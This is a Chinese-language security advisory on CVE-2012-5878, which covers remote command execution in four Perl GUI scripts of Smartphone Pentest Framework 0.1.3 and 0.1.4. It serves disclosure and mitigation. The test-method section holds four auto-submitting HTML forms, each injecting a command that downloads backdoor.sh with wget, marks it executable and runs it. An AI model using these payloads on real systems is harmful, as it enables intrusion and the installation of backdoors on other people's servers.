Smartphone Pentest Framework多个远程命令执行漏洞

Smartphone Pentest Framework多个远程命令执行漏洞

发布日期：2012-12-10
更新日期：2012-12-12

受影响系统：
bulbsecurity Smartphone Pentest Framework 0.1.4
bulbsecurity Smartphone Pentest Framework 0.1.3
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56881
CVE(CAN) ID: CVE-2012-5878

Smartphone Pentest Framework (SPF)是开源的智能手机渗透测试框架。

Smartphone Pentest Framework 0.1.3、0.1.4及其他版本"/frameworkgui/"目录内的多个Perl脚本没有对system()函数的参数进行合法性检查，攻击者通过精心构造的请求即能以web server的权限执行任意系统命令。

1）SEAttack.pl存在漏洞，没有检查"hostingPath"参数值的合法性。

2）CSAttack.pl存在漏洞，没有检查"hostingPath"参数值的合法性。

3）attachMobileModem.pl存在漏洞，没有检查"appURLPath"参数值的合法性。

4）guessPassword.pl存在漏洞，没有检查"ipAddressTB"参数值的合法性。

<*来源：High-Tech Bridge
 
  链接：http://seclists.org/bugtraq/2012/Dec/74?utm_source=twitterfeed&utm_medium=twitter
        https://www.htbridge.com/advisory/HTB23122
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1.

<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl"
method="post" name=f1>
<input type="hidden" name="platformDD2" value='Android' />
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

2.

<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl"
method="post" name=f1>
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

3.

<form
action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl"
method="post" name=f1>
<input type="hidden" name="appURLPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

4.

<form
action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl"
method="post" name=f1>
<input type="hidden" name="ipAddressTB" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

建议：
--------------------------------------------------------------------------------
临时解决方法：

删除或禁用SPF的GUI。

厂商补丁：

bulbsecurity
------------
虽然2012年12月5日，vendor发布了补丁，但是0.1.4版本还是存在漏洞，请使用我们推荐的临时处理办法，厂商参考链接：

http://www.bulbsecurity.com/smartphone-pentest-framework/